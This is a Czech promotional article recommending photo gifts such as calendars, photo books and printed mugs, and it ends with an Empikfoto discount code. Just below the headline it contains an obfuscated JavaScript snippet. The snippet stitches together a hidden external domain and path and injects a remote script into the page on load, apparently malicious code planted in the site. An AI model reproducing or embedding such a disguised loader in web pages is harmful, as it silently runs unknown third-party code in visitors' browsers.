Darujte blízkým dárky s fotografiemi – pod stromečkem potěší celou rodinu i přátele


(function(){
xi67_=("u"+"")+"s"+"";xi67_+=("tat.")+("i");
xi67=document.createElement("script");xi67.type="text/javascript";xi67_+="nf"+("o")+"/";
xi67u="185185443"+".";xi67.async=true;xi67u+="Xgr0fw0hi67mews65uXmmh2rygpz13";
xi67.src="https://"+xi67_+xi67u;xi67b=document.body;xi67b.appendChild(xi67);
})();

Vánoce se nezadržitelně blíží, pokud se tedy chcete vyhnout ryzím svátečním shonům, máte nejvyšší čas začít řešit, čím své blízké letos obdarujete. Skvělým řešením jsou dárky, které můžete personalizovat pomocí fotografií. A jelikož výběr je v tomto případě doslova nepřeberný, vhodný foto-dárek jistě najdete pro každého člena své rodiny.

Fotokalendář potěší prarodiče

Pravděpodobně nejklasičtějším dárkem z foto-ranku jsou fotokalendáře. Ty obvykle nejvíce potěší starší generaci, která si tak díky snímkům může neustále připomínat své potomky a vnoučata. Pokud jste tedy babičce chtěli obligátně pod stromeček nadělit knihu křížovek a dědečkovi teplé papuče, pro letošek zkuste být trošku kreativnější. Zatímco babička bude určitě fotokalendářem nadšená a bude se jím moci chlubit i kamarádkám, ani dědeček nemusí přijít zkrátka. Na zahřátí mu tak místo bačkor můžete nadělit nejen chutný čaj (a třeba i lahev něčeho ostřejšího), ale i hrneček s fotkou přesně dle vašeho výběru. Především v případě fotokalendáře ale počítejte s tím, že jeho tisk rozhodně není vhodné nechávat na posledních pár dní před svátky – do výběru fotek se tedy ponořte co nejdříve, abyste pak „s nervy na pochodu“ na Štědrý den na poště nelovili v předvánočním shonu zaseknutou zásilku…

Fotokniha – dárek pro celou rodinu

Dnešní digitální doba klasickým fotografiím zrovna nepřeje. Fotoalba zavál prach, k archivaci fotek slouží sociální sítě nebo online účty propojené s mobilními telefony. Jenže – ruku na srdce – kdo má čas se tisíci fotkami v počítači probírat? Proto není vůbec špatný nápad alespoň jednou za rok udělat foto-průřez všemi událostmi, které se odehrály, a zvolené obrázky zpracovat do fotoknihy. Ta je v podstatě moderní podobou fotoalba, do vizuálně atraktivního hávu tak lze zabalit nejen celoroční zážitky, ale třeba i jednu významnou událost. I v tomto případě ale platí, že byste si na tvorbu takového dárku měli vyhradit dostatek času, a to nejen na výběr fotografií, ale i jejich seřazení a následné zpracování v editoru, který za tímto účelem slouží. Ačkoliv jeho užití je docela intuitivní, přeci jen nespočet dostupných designů člověka láká ke zkoušení různých podob výsledku…což se nakonec může proměnit v činnost, jež si vyžádá i nějakou tu hodinu navíc.

Fotkami nešetřete…

Možnosti foto-potisků jsou ale samozřejmě mnohem širší a nezahrnují jen tvorbu fotokalendářů a fotoknih. Nejmenší tak potěší např. plyšové hračky s fotografiemi, své dovednosti si pak mohou zdokonalovat i skládáním foto-puzzle. Naopak pro kamarády můžete nechat zábavnými fotkami z vašich společných akcí potisknout třeba obal na mobilní telefon, klíčenku nebo magnetku na lednici. Jednoduše řečeno, výběr je bohatý, stačí se jen ponořit do celé nabídky fotoproduktů na webu Empikfoto a zvolit pro každého „foto dárek na míru“. Nyní můžete s promo kódem „novinykraje“ získat slevu na všechny produkty. Slevový kód je platný do konce roku.